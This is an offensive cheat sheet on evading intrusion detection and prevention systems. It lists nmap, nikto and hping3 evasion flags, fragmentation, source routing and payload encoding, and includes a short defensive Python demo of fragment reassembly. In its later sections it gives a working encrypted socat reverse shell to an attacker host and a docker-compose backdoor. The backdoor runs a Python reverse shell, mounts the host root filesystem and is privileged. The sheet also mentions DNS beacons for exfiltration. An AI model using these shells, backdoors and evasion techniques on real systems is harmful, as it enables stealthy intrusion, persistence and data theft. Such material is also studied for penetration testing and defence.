# IDS & IPS Evasion

* Evasion by manipulation of
    * Tool parameters
    * Protocol
    * Payload
    * Route
* Or DoS (tactical denial of service of the IDS/IPS or its logging, see below)

## Enumeration

* [User-Agents](https://developers.whatismybrowser.com/useragents/explore/) (list of common User-Agent strings)

### nmap

* `--script-args http.useragent="<user-agent>"` sets the User-Agent used by HTTP NSE scripts
* `-sS` half-open (SYN) scan

### nikto

* `-useragent <user-agent>`
* Tuning `-T 1 2 3`
* __NOT__ `-evasion <encoding-technique>`: it increases detection rather than reducing it

## Protocol Manipulation

### Relying on another protocol

* `nc -ulvnp 4711` to listen for incoming UDP traffic
* `nc -u $TARGET_IP $TARGET_PORT` to connect over UDP

### Manipulation of the source's (LHOST's) network port

* `nmap -g 80` or `nmap --source-port 53` sends the outgoing nmap traffic from that source port

### Session splicing by fragmentation and segmentation

* `nmap` fragmentation: `-f` for 8-byte fragments, `-ff` for 16-byte fragments, `--mtu <size>` for a custom MTU (the size must be a multiple of 8)
* Use [Fragroute](https://www.monkey.org/~dugsong/fragroute/) with `ip_frag <num>` in `fragroute.conf`, then run `fragroute -f fragroute.conf $TARGET_IP`

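Added example (not from the original cheat sheet) of why the fragmentation above defeats a sensor that matches signatures per packet, and of the defender's answer: reassemble the datagram before matching, and alert on overlapping fragments instead of guessing how the host resolves them. The `Fragment` model, `SIGNATURE` and the sample request are constructed for this demonstration; offsets use the real IPv4 8-byte unit.

```python
from dataclasses import dataclass

SIGNATURE = b"GET /etc/passwd"   # constructed sample signature (hypothetical rule content)

@dataclass
class Fragment:
    ident: int      # IPv4 Identification field, shared by all fragments of one datagram
    offset: int     # IPv4 Fragment Offset field, counted in 8-byte units
    more: bool      # MF flag: set on every fragment except the last one
    payload: bytes

def fragment(ident, data, size=8):
    """Split `data` into `size`-byte fragments, as `nmap -f` (8) and `-ff` (16) do.
    `size` must be a multiple of 8 because IPv4 offsets are counted in 8-byte units."""
    if size % 8:
        raise ValueError("fragment size must be a multiple of 8")
    return [Fragment(ident, i // 8, i + size < len(data), data[i:i + size])
            for i in range(0, len(data), size)]

def reassemble(frags):
    """Return the reassembled datagram, or None while fragments are still missing.
    Fragments may arrive in any order. Overlapping fragments raise ValueError:
    hosts resolve overlaps differently, so an IDS should alert instead of guessing."""
    if len({f.ident for f in frags}) != 1:
        raise ValueError("fragments belong to different datagrams")
    ordered = sorted(frags, key=lambda f: f.offset)
    buf = bytearray()
    for f in ordered:
        start = f.offset * 8
        if start < len(buf):
            raise ValueError("overlapping fragment at byte offset %d" % start)
        if start > len(buf):
            return None                 # hole: an earlier fragment has not arrived yet
        buf += f.payload
    if ordered[-1].more:
        return None                     # the final fragment (MF=0) has not arrived yet
    return bytes(buf)

def matches_per_packet(frags, sig=SIGNATURE):
    """Naive IDS: inspect every fragment on its own, which is what the evasion relies on."""
    return any(sig in f.payload for f in frags)

def matches_reassembled(frags, sig=SIGNATURE):
    """Normalising IDS: reassemble the datagram first, then match the signature."""
    data = reassemble(frags)
    return data is not None and sig in data

if __name__ == "__main__":
    frags = fragment(0x1234, b"GET /etc/passwd HTTP/1.0\r\n\r\n", 8)   # constructed sample
    print(matches_per_packet(frags), matches_reassembled(frags))        # False True
```

With 8-byte fragments no single packet holds the 15-byte signature, so only the reassembling matcher fires; with 16-byte fragments (`-ff`) the signature still fits in the first fragment, which is why small fragment sizes are the ones worth alerting on.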
### Sending invalid packets

* Invalid protocol header flags and checksums via `nmap --badsum` and `nmap --scanflags URG/ACK/PSH/RST/SYN/FIN`, e.g. a concatenation of multiple flags: `nmap --scanflags SYNRSTFIN`
* `hping3`, including `--ttl`, `--badsum` and the header flags `-S`, `-A`, `-P`, `-U`, `-F`, `-R`

## Payload Manipulation

### Obfuscation and Encoding

* Base64
* URL encoding
* Escaped Unicode characters

### Encrypting Communication Channels

* Use socat with encryption; first create a self-signed certificate and key

```sh
openssl req -x509 -newkey rsa:2048 -days 356 -subj '/CN=www.example.com/O=YO/C=FR' -nodes -keyout id_rsa.key -out reverse.crt
```

* Create a `.pem` (Privacy Enhanced Mail) file via

```sh
cat id_rsa.key reverse.crt > reverse.pem
```

* Listening on the attacker side

```sh
socat -d -d OPENSSL-LISTEN:4711,cert=reverse.pem,verify=0,fork STDOUT
```

* On the target

```sh
socat OPENSSL:$ATTACKER_IP:4711,verify=0 EXEC:/bin/bash
```

### Modification of Data

* Order of parameters: instead of `nc -lvnp` use `nc -vpnl`
* Adding whitespace to the commands
* Use aliases

## Route Manipulation

### Relying on Source Routing

* `nmap --ip-options "L 10.10.20.30 10.10.30.40"` routes through these IPs loosely (loose source routing)
* `nmap --ip-options "S 10.10.20.30 10.10.30.40"` routes through these IPs strictly (strict source routing)

### Using Proxy Servers

* `nmap --proxies http://$PROXY1:80,socks4://$PROXY2:8080 $TARGET_IP`; note that nmap's proxy chain currently applies only to NSE scripts and version detection, not to the raw port-scan phase such as `-sS`

## Tactical DoS

* Non-malicious, benign traffic against
    * the IDS/IPS
    * the logging server

## MISC

* Changing
    * `User-Agent`
    * Request frequency and duration of sleep
    * SSL/TLS certs
* DNS beacon, storing exfiltrated data in the query

## Backdoors

* Backdooring without getting recognized by the IDS/IPS: read its rules in the config file first

### Docker

* Create a `docker-compose.yaml` file with a reverse shell as the entrypoint and mount the host's root volume to `/mnt` inside the container

```yaml
---
version: "2.1"
services:
  backdoorservice:
    restart: always
    image: <Found image>
    entrypoint: >
      python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
      s.connect(("<$ATTACKER_IP>",4711));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);
      pty.spawn("/bin/sh")'
    volumes:
      - /:/mnt
    privileged: true
```